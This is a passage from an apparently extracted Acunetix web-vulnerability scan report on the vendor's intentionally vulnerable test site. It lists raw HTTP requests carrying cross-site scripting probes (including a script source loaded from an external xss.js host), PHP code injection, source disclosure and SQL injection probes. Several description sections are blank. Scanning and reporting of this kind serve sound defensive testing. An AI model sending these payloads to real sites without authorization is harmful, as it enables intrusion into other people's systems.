Request GET /showimage.php?file=< /FRAMESET>&size=160 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:11 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details

Request GET /showimage.php?file=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28497875938383%29%3B%22 %3E HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:11 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details

Acunetix Website Audit

198

Request GET /showimage.php?file=alert(497825938383)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:11 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details Request GET /showimage.php?file=alert(497835938383)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:11 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details

Request GET /showimage.php?file=< /FRAMESET> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response Acunetix Website Audit

199

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:12 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details Request GET /showimage.php?file=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28498055938467%29%3B%22%3E HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:12 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details

Request GET /showimage.php?file= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:12 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details Request Acunetix Website Audit

200

GET /showimage.php?file=&size=160 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:12 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details

Request GET /showimage.php?file=&size=160 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:11 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details

Request GET /showimage.php?file=&size=160 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix Website Audit 201

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:12 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details Request GET /showimage.php?file=&size=160 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:12 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details Request GET /showimage.php?file=-->alert(497845938383)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:11 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details Request GET /showimage.php?file=alert(497735938382)%3B&size=160 HTTP/1.0 Acunetix Website Audit

202

Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:11 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details Request GET /showimage.php?file=-->alert(497745938382)%3B&size=160 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:11 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details Request GET /showimage.php?file=>">alert(497715938382)%3B&size=160 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:11 GMT Content-Type: image/jpeg Connection: close Acunetix Website Audit

203

/showimage.php Details Request GET /showimage.php?file=alert(497695938382)%3B&size=160 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:11 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details Request GET /showimage.php?file=&size=160 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:11 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details Request GET /showimage.php?file=>'>alert(497705938382)%3B&size=160 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix Website Audit

204

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:11 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details Request GET /showimage.php?file=alert(497725938382)%3B&size=160 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:11 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details Request GET /showimage.php?file=alert(497795938383)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:11 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details Request GET /showimage.php?file=>'>alert(497805938383)%3B HTTP/1.0 Acunetix Website Audit

205

Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:11 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details Request GET /showimage.php?file=>">alert(497815938383)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:11 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details

Request GET /showimage.php?file=email@somealert(497855938383)%3Bdomain.com HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:11 GMT Content-Type: image/jpeg Acunetix Website Audit

206

Connection: close /showimage.php Details

Request GET /showimage.php?file=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28497775938382%29%3B%22 %3E&size=160 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:11 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details

Request GET /showimage.php?file=email@somealert(497755938382)%3Bdomain.com &size=160 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:11 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details Request GET /showimage.php?file= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Acunetix Website Audit

207

Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:11 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details

Request GET /showimage.php?file="+src="http://testphp.acunetix.com/xss.js?498275938577 "> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:12 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details Request GET /showimage.php?file=alert(498295938577)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:13 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

208

/showimage.php Details Request GET /showimage.php?file=&size=160 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:12 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details

Request GET /showimage.php?file= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Acunetix Website Audit

211

Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:12 GMT Content-Type: image/jpeg Connection: close /showimage.php Details Request GET /showimage.php?file= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:12 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details Request GET /showimage.php?file= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:12 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details

Request GET /showimage.php?file= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Acunetix Website Audit

212

Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:12 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details Request GET /showimage.php?file=&size=160 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:12 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details Request GET /showimage.php?file= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:12 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details

Request GET /showimage.php?file="+src="http://testphp.acunetix.com/xss.js?498175938540 ">&size=160 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:12 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

PHP code injection Severity High Type Validation Reported by module Parameter manipulation Description

Acunetix Website Audit

214

Impact

Recommendation

Affected items /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 153 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=%26lt%3Byour%20name%20here%26gt%[email protected]&Submit=Sub mit&phpaction=printf(md5(acunetix_wvs_security_test))%3Bexit%3B// Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:51:13 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 127 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected]&Submit=Submit&phpaction=printf(md5(a cunetix_wvs_security_test))%3Bexit%3B// Response HTTP/1.1 200 OK Server: nginx/1.4.1 Acunetix Website Audit

215

Date: Mon, 21 Aug 2017 08:51:13 GMT Content-Type: text/html Connection: close

Proxy accepts CONNECT requests Severity High Type Configuration Reported by module Scripting Description

Impact

Recommendation

Affected items Server Details

Script source code disclosure Severity High Type Validation Reported by module Parameter manipulation Description

Impact

Recommendation

Affected items /showimage.php Details Request GET /showimage.php?file=showimage.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Acunetix Website Audit

216

Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:43 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

SQL injection Severity High Type Validation Reported by module Parameter manipulation Description

Impact

Recommendation

Affected items /listproducts.php Details Request GET /listproducts.php?artist=\' HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix Website Audit

217

Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:20 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist=\" HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:20 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist=JyI%3D HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:20 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist=acunetix'" HTTP/1.0 Acunetix Website Audit

218

